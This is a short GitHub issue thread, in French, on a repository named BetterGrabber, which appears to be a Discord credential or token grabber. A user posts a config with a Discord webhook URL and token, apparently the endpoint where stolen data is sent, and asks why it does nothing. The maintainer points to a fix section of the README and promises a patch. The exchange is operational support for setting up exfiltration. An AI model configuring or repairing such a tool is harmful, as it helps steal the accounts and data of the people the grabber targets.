### ISSUE TITLE
<Error>

### ISSUE THREAD

**Issue by Lil-Skiirrtt** [HideakiAtsuyo/BetterGrabber#24]
**Config**
```js
        var config = {
            pingOnResult: true,
            webHook: "/api/webhooks/867354694548193311/NKBmvsbznULqt4FDuW952PhPD8FNef5x1gTgzAKRYGmLgRg8rIvK7M1M5kNpbEI9Wskc",
            webhookUsername: "Hello World",
            webhookAvatar: "https://cdn.discordapp.com/avatars/908070943329488916/35ebf6d39bc25e52da855424119bc28f.webp?size=80",

            embedTitle: "Hello World",
            embedColor: 0x36393f,

            tts: false
        };
```

**Problem**

J'ai beau essayer de le config mais rien ne se passe

**Comment by HideakiAtsuyo** [comment]
> **Config**
> 
> ```js
>         var config = {
>             pingOnResult: true,
>             webHook: "/api/webhooks/867354694548193311/NKBmvsbznULqt4FDuW952PhPD8FNef5x1gTgzAKRYGmLgRg8rIvK7M1M5kNpbEI9Wskc",
>             webhookUsername: "Hello World",
>             webhookAvatar: "https://cdn.discordapp.com/avatars/908070943329488916/35ebf6d39bc25e52da855424119bc28f.webp?size=80",
> 
>             embedTitle: "Hello World",
>             embedColor: 0x36393f,
> 
>             tts: false
>         };
> ```
> 
> **Problem**
> 
> J'ai beau essayer de le config mais rien ne se passe

https://github.com/HideakiAtsuyo/BetterGrabber#fix je vais poster le fix tout de suite :)

**Comment by Lil-Skiirrtt** [comment]
> > **Config**
> > ```js
> >         var config = {
> >             pingOnResult: true,
> >             webHook: "/api/webhooks/867354694548193311/NKBmvsbznULqt4FDuW952PhPD8FNef5x1gTgzAKRYGmLgRg8rIvK7M1M5kNpbEI9Wskc",
> >             webhookUsername: "Hello World",
> >             webhookAvatar: "https://cdn.discordapp.com/avatars/908070943329488916/35ebf6d39bc25e52da855424119bc28f.webp?size=80",
> > 
> >             embedTitle: "Hello World",
> >             embedColor: 0x36393f,
> > 
> >             tts: false
> >         };
> > ```
> > 
> > 
> >     
> >       
> >     
> > 
> >       
> >     
> > 
> >     
> >   
> > **Problem**
> > J'ai beau essayer de le config mais rien ne se passe
> 
> https://github.com/HideakiAtsuyo/BetterGrabber#fix je vais poster le fix tout de suite :)

merci mec

**Comment by HideakiAtsuyo** [comment]
T'inquiète, je close je poste le fix dans la journée !
